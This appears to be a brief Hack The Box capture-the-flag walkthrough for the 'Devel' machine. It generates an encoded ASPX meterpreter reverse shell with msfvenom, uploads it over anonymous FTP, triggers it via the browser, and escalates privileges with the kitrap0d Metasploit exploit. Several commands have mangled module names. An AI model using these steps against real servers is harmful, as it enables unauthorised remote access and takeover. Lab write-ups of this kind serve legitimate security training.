Hack The Box CTF :: Devel

This box is open via http/ftp on We'll use ftp to upload a reverse shell and run it over http via browser.

Create an aspx shell using msfvenom:

msfvenom -f aspx -p windows/meterpreter/reversetcp LHOST=(Your IP) LPORT=8888 -e x86/shikataga_nai -o path/to/aspxshell.aspx

FTP to the server and place your .aspx shell file:


login: anonymous
password: n/a

put /usr/share/webshells/aspx aspxshell.aspx

Using another terminal launch msf.

Once open execute the shell by targeting your .aspx file via browser. Go back to your msf terminal and find the open sessions:

use post/windows/manage/migrate
set session #

You should now be able to locate (user) after targeting the correct session.

Execute exploit for privilege escalation (root):

use exploit/windows/local/ms10015kitrap0d
show targets
set target #

session -i #

HTB: https://www.hackthebox.eu/